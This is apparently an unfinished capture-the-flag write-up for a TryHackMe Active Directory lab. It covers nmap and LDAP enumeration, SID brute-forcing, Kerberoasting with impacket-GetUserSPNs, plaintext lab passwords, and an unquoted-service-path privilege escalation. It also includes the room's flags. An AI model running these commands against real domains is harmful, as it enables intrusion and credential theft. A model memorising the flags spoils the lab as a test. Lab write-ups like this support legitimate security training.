thm-labs-1-Enterprise v2 - My-oscp-all-things

[[Get-Acl]] System IP ： 10.10.93.195 ### Summary **1- Overview** **2- Enumeration** 2.1- Nmap Scan 2.2- Web Site Discovery 2.3- Active Directory Enumeration **3- Privilege Escalation** 3.1- Post-Compromise Enumeration 3.2- New Account Enumeration 3.3- Post-Compromise Exploitation ## 1- Overview ```text 通过web界面发现迁移github 去github找到dev里的commit记录找到账号密码，通过iimpacket-GetUserSPNs dump bitbucket的hash并remote rdp login, 最后通过不安全的路径没有带引号且可以通过acl来重启（即powershell的get-acl功能），达到system权限 ``` ## 2- **Enumeration** ### 2.1-Service Enumeration **Using autoNmap for scanning：** ``` /mnt/nmapAutomator/nmapAutomator.sh -o ./ -t all 10.10.93.195 ``` **The nmap results are as follows:** ``` PORT STATE SERVICE REASON VERSION 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 7990/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Log in to continue - Log in with Atlassian account 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49708/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49836/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC ``` ### Web hack ![[Pasted image 20220117223944.png]] http://10.10.93.195:7990/ searchsploit atlassian JIRA ![[Pasted image 20220117224640.png]] ``` Sq00ky ```` ![[Pasted image 20220117235554.png]] nik : ToastyBoi! ![[Pasted image 20220117235809.png]] ### 2.2- Active Directory Enumeration **search some ldap information** Let’s begin with using ldapsearch to grab general information: ``` nmap -n -sV --script "ldap* and not brute" 10.10.93.195 nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='vulnnet-rst.local'" 10.10.93.195 ldapsearch -x -s base namingcontexts -h 10.10.93.195 ldapsearch -x -D '' -w '' -b "DC=ENTERPRISE,DC=THM" -h 10.10.93.195 ldapsearch -x -D 'active.htb\SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "DC=active,DC=htb" -h ``` **The results are as follows:** ``` # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingcontexts # # dn: namingcontexts: CN=Configuration,DC=ENTERPRISE,DC=THM namingcontexts: CN=Schema,CN=Configuration,DC=ENTERPRISE,DC=THM namingcontexts: DC=ForestDnsZones,DC=ENTERPRISE,DC=THM namingcontexts: DC=LAB,DC=ENTERPRISE,DC=THM namingcontexts: DC=DomainDnsZones,DC=LAB,DC=ENTERPRISE,DC=THM # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 ``` DC domain : ``` ENTERPRISE.THM LAB-ENTERPRISE LAB-ENTERPRISE.THM ``` and we can use impacket-lookupsid to find some user ``` impacket-lookupsid [email protected] ``` results ``` [*] Brute forcing SIDs at 10.10.93.195 [*] StringBinding ncacn_np:10.10.93.195[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-2168718921-3906202695-65158103 500: LAB-ENTERPRISE\Administrator (SidTypeUser) 501: LAB-ENTERPRISE\Guest (SidTypeUser) 502: LAB-ENTERPRISE\krbtgt (SidTypeUser) 512: LAB-ENTERPRISE\Domain Admins (SidTypeGroup) 513: LAB-ENTERPRISE\Domain Users (SidTypeGroup) 514: LAB-ENTERPRISE\Domain Guests (SidTypeGroup) 515: LAB-ENTERPRISE\Domain Computers (SidTypeGroup) 516: LAB-ENTERPRISE\Domain Controllers (SidTypeGroup) 517: LAB-ENTERPRISE\Cert Publishers (SidTypeAlias) 520: LAB-ENTERPRISE\Group Policy Creator Owners (SidTypeGroup) 521: LAB-ENTERPRISE\Read-only Domain Controllers (SidTypeGroup) 522: LAB-ENTERPRISE\Cloneable Domain Controllers (SidTypeGroup) 525: LAB-ENTERPRISE\Protected Users (SidTypeGroup) 526: LAB-ENTERPRISE\Key Admins (SidTypeGroup) 553: LAB-ENTERPRISE\RAS and IAS Servers (SidTypeAlias) 571: LAB-ENTERPRISE\Allowed RODC Password Replication Group (SidTypeAlias) 572: LAB-ENTERPRISE\Denied RODC Password Replication Group (SidTypeAlias) 1000: LAB-ENTERPRISE\atlbitbucket (SidTypeUser) 1001: LAB-ENTERPRISE\LAB-DC$ (SidTypeUser) 1102: LAB-ENTERPRISE\DnsAdmins (SidTypeAlias) 1103: LAB-ENTERPRISE\DnsUpdateProxy (SidTypeGroup) 1104: LAB-ENTERPRISE\ENTERPRISE$ (SidTypeUser) 1106: LAB-ENTERPRISE\bitbucket (SidTypeUser) 1107: LAB-ENTERPRISE\nik (SidTypeUser) 1108: LAB-ENTERPRISE\replication (SidTypeUser) 1109: LAB-ENTERPRISE\spooks (SidTypeUser) 1110: LAB-ENTERPRISE\korone (SidTypeUser) 1111: LAB-ENTERPRISE\banana (SidTypeUser) 1112: LAB-ENTERPRISE\Cake (SidTypeUser) 1113: LAB-ENTERPRISE\Password-Policy-Exemption (SidTypeGroup) 1114: LAB-ENTERPRISE\Contractor (SidTypeGroup) 1115: LAB-ENTERPRISE\sensitive-account (SidTypeGroup) 1116: LAB-ENTERPRISE\contractor-temp (SidTypeUser) 1117: LAB-ENTERPRISE\varg (SidTypeUser) 1118: LAB-ENTERPRISE\adobe-subscription (SidTypeGroup) 1119: LAB-ENTERPRISE\joiner (SidTypeUser) ``` userlist: ``` atlbitbucket bitbucket nik replication spooks korone banana Cake contractor-temp varg joiner ``` ``` impacket-GetUserSPNs lab.ENTERPRISE.THM/nik:ToastyBoi! -request -dc-ip 10.10.93.195 ``` ![[Pasted image 20220118001008.png]] bitbucket : littleredbucket ![[Pasted image 20220118001543.png]] ![[Pasted image 20220118012616.png]] C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe 查询该文件目录权限，发现我们可以写入 ``` Get-Acl -Path "C:\Program Files (x86)\Zero Tier\Zero Tier One\" | Format-List ``` ![[Pasted image 20220118012937.png]] 查询该服务的启动重启权限使用脚本 Get-ServiceACL.ps1 ``` "zerotieroneservice" | Get-ServiceAcl | select -ExpandProperty Access ``` ![[Pasted image 20220118013158.png]] ![[Pasted image 20220118013217.png]] ![[Pasted image 20220118011625.png]] user.txt :THM{ed882d02b34246536ef7da79062bef36} root.txt : THM{1a1fa94875421296331f145971ca4881} ### 破解hash-命令-截图，winrmlogin-命令-截图 ## 3- Privilege Escalation ### 3.1- Post-Compromise Enumeration like whoami /all \ peas.exe \... informations gathering but it useful thing ### 3.2- New Account Enumeration ### Local.txt Screenshot ### Local.txt Content ### 3.3- Post-Compromise Exploitation ### Privilege Escalation ### Proof.txt Screenshot Get to proof.txt: ### Proof.txt Content dsa ### summary and overview 总结和概述若有收获，就点个赞吧